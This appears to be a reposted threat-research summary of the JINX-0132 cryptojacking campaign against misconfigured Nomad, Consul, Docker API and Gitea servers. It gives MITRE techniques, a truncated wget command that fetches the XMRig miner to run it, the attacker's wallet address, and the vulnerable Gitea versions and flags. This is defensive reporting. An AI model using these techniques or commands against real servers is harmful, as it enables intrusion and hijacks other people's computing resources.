Threat Research

DevOps Tools Targeted for Cryptojacking | Wiz Blog

iocOne
DevOps Tools Targeted for Cryptojacking | Wiz Blog

A cryptojacking campaign by threat actor JINX-0132 targets publicly accessible DevOps servers running Nomad, Consul, Docker API, and Gitea by exploiting misconfigurations and known vulnerabilities. The attackers use standard tools, such as the open-source XMRig miner, avoiding custom malware, which complicates detection and tracking. #JINX0132 #Nomad #Consul #Gitea #DockerAPI #XMRig

Keypoints

  • JINX-0132 exploits misconfigurations in Nomad, Consul, Docker API, and Gitea to deploy Monero mining malware on compromised servers.
  • This campaign represents the first publicly documented exploitation of Nomad misconfigurations for cryptojacking purposes.
  • The attackers download the XMRig miner directly from its public GitHub repository and execute it without using attacker-controlled infrastructure.
  • Nomad’s default insecure configuration allows any user with API access to create and run jobs, enabling remote code execution.
  • Gitea instances are compromised via vulnerabilities and misconfigurations, including post-authentication RCE and unlocked installation wizards.
  • Consul servers without ACLs or security features enabled allow unauthorized service registrations with malicious health checks that run crypto-mining commands.
  • Exposed Docker APIs on TCP ports 2375 or 2376 permit attackers to launch containers with host filesystem mounts, facilitating malicious activities.
  • Wiz Research data shows high exposure rates of these vulnerable technologies in cloud environments, emphasizing the need for proper security configurations.
  • Recommended defenses include enabling ACLs, disabling risky features like git hooks and script checks, restricting API exposure, and keeping software versions up to date.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Attackers executed shell commands via Nomad jobs and Consul health checks to download and run XMRig miner (‘apt-get update -y ; wget https://github.com/xmrig/xmrig/releases…’ ).
  • [T1048] Exfiltration Over Alternative Protocol – Use of legitimate public github.com repositories to obtain mining software binaries (‘download tools directly from public GitHub repositories’).
  • [T1190] Exploit Public-Facing Application – Exploitation of Gitea RCE vulnerabilities (e.g., CVE-2020-14144) and misconfigurations to gain initial foothold (‘Older versions of Gitea can be susceptible to post-authentication remote code execution’).
  • [T1574] Hijack Execution Flow – Registering malicious jobs and services in Nomad and Consul to achieve execution of malicious payloads (‘any user with access to the Nomad server API can create and run these jobs’).
  • [T1105] Ingress Tool Transfer – Attackers fetch XMRig miner from external public sources rather than attacker-controlled servers (‘downloads the most recent version of XMRig miner directly from its public GitHub repository’).
  • [T1569] System Services – Abuse of Docker API to create and start containers running crypto-miners with mounted host filesystem (‘attackers can create a container that mounts the host filesystem’).

Indicators of Compromise

  • [Wallet Address] Used by XMRig miner to receive mined Monero – 468VEByGGFQSN2bJG99ovhe5SG9SLxLAA9e2s7tWFxvBM33FAEP4JbwYHEeXexq8djYpDEHg9Jq6eGF3rREnAAc4UkjLd3E
  • [URL] XMRig binary download source – https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
  • [Software Versions] Vulnerable Gitea versions – 1.1.0 through 1.12.5 (post-authentication RCE), 1.4.0 (unauthenticated RCE)
  • [Configuration Flags] Gitea insecure settings – DISABLEGITHOOKS set to false or git hooks enabled manually, INSTALL_LOCK=false (installer unlocked)
  • [Ports] Docker API exposed – tcp://0.0.0.0:2375 and 2376, allowing remote container control

Read more: https://www.wiz.io/blog/jinx-0132-cryptojacking-campaign